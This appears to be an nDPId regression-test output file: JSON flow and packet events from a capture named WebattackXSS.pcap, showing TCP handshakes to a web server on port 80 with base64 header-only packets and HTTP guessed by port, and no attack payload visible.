+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1499347579405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347579405,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mitAAD4GK6WsEAABwKgKMuVQAFAuJKdkAAAAAKACchBlUAAAAgQFtAQCCAoBOz1PAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":2,"flow_last_seen":1499347579406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347579406,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5VD8Ip+YLiSnZaAScSC3ygAAAgQFtAQCCAoD5Q7EATs9TwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":3,"flow_last_seen":1499347579406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347579406,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mixAAD4GK6ysEAABwKgKMuVQAFAuJKdl\/CKfmYAQAOVW0gAAAQEICgE7PU8D5Q7E"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347580693,"flow_last_seen":1499347580693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347580693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1499347580693,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347580693,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ma5AAD4GlCKsEAABwKgKMuVeAFCEtA8\/AAAAAKACchCllQAAAgQFtAQCCAoBOz6RAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5118,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":2,"flow_last_seen":1499347580694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347580694,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5V5F9x9ShLQPQKAScSAtQAAAAgQFtAQCCAoD5RAGATs+kQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5120,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":3,"flow_last_seen":1499347580694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347580694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ma9AAD4GlCmsEAABwKgKMuVeAFCEtA9ARfcfU4AQAOXMRwAAAQEICgE7PpED5RAG"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347583209,"flow_last_seen":1499347583209,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347583209,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1499347583209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347583209,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hK5AAD4GQSKsEAABwKgKMuV4AFAxSsWoAAAAAKACchBABwAAAgQFtAQCCAoBO0EGAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":2,"flow_last_seen":1499347583209,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347583209,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5XgjIturMUrFqaAScSAruAAAAgQFtAQCCAoD5RJ7ATtBBgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":3,"flow_last_seen":1499347583211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347583211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hK9AAD4GQSmsEAABwKgKMuV4AFAxSsWpIyLbrIAQAOXKvgAAAQEICgE7QQcD5RJ7"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347584472,"flow_last_seen":1499347584472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347584472,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1499347584472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347584472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XXVAAD4GaFusEAABwKgKMuWGAFAsKR83AAAAAKACchDqTwAAAgQFtAQCCAoBO0JCAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":2,"flow_last_seen":1499347584472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347584472,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5YYTf0ohLCkfOKAScSB18gAAAgQFtAQCCAoD5RO3ATtCQgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5152,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":3,"flow_last_seen":1499347584473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347584473,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XXZAAD4GaGKsEAABwKgKMuWGAFAsKR84E39KIoAQAOUU+gAAAQEICgE7QkID5RO3"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347585744,"flow_last_seen":1499347585744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347585744,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1499347585744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347585744,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CJdAAD4GvTmsEAABwKgKMuWUAFD9vEsXAAAAAKACchDrjwAAAgQFtAQCCAoBO0OAAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5163,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":2,"flow_last_seen":1499347585745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347585745,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ZQRxaCL\/bxLGKAScSAhRAAAAgQFtAQCCAoD5RT1ATtDgAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5165,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":3,"flow_last_seen":1499347585746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347585746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CJhAAD4GvUCsEAABwKgKMuWUAFD9vEsYEcWgjIAQAOXASwAAAQEICgE7Q4AD5RT1"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347452731,"flow_last_seen":1499347457736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347452731,"flow_last_seen":1499347457736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347455224,"flow_last_seen":1499347460737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347455224,"flow_last_seen":1499347460737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347456462,"flow_last_seen":1499347461738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347456462,"flow_last_seen":1499347461738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347457705,"flow_last_seen":1499347462738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347457705,"flow_last_seen":1499347462738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347460253,"flow_last_seen":1499347465739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347460253,"flow_last_seen":1499347465739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347461508,"flow_last_seen":1499347466739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5177,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347461508,"flow_last_seen":1499347466739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347586996,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347588270,"flow_last_seen":1499347588270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347588270,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1499347588270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347588270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nX9AAD4GKFGsEAABwKgKMuWuAFBMCdiIAAAAAKACchANQQAAAgQFtAQCCAoBO0X3AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":2,"flow_last_seen":1499347588270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347588270,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5a7qCbUZTAnYiaAScSBTqgAAAgQFtAQCCAoD5RdtATtF9wEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5183,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":3,"flow_last_seen":1499347588271,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347588271,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nYBAAD4GKFisEAABwKgKMuWuAFBMCdiJ6gm1GoAQAOXysAAAAQEICgE7RfgD5Rdt"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347589555,"flow_last_seen":1499347589555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347589555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1499347589555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347589555,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QWlAAD4GhGesEAABwKgKMuW8AFCYtAZQAAAAAKACchCRfgAAAgQFtAQCCAoBO0c5AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5193,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":2,"flow_last_seen":1499347589555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347589555,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5bxlqZ52mLQGUaAScSBxqgAAAgQFtAQCCAoD5RiuATtHOQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5194,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":3,"flow_last_seen":1499347589557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347589557,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QWpAAD4GhG6sEAABwKgKMuW8AFCYtAZRZamed4AQAOUQsgAAAQEICgE7RzkD5Riu"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5213,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347592060,"flow_last_seen":1499347592060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347592060,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5213,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1499347592060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347592060,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMuXWAFA6JsujAAAAAKACchAoLQAAAgQFtAQCCAoBO0mrAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5214,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":2,"flow_last_seen":1499347592060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347592060,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5dZ5GzqJOibLpKAScSBWYgAAAgQFtAQCCAoD5RsgATtJqwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5215,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":3,"flow_last_seen":1499347592061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347592061,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMuXWAFA6JsukeRs6ioAQAOX1aQAAAQEICgE7SasD5Rsg"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347593330,"flow_last_seen":1499347593330,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347593330,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1499347593330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347593330,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8X5xAAD4GZjSsEAABwKgKMuXkAFAOABV0AAAAAKACchAJOAAAAgQFtAQCCAoBO0roAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":2,"flow_last_seen":1499347593330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347593330,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5eQdKIqzDgAVdaAScSBB+AAAAgQFtAQCCAoD5RxeATtK6AEDAwc="} 
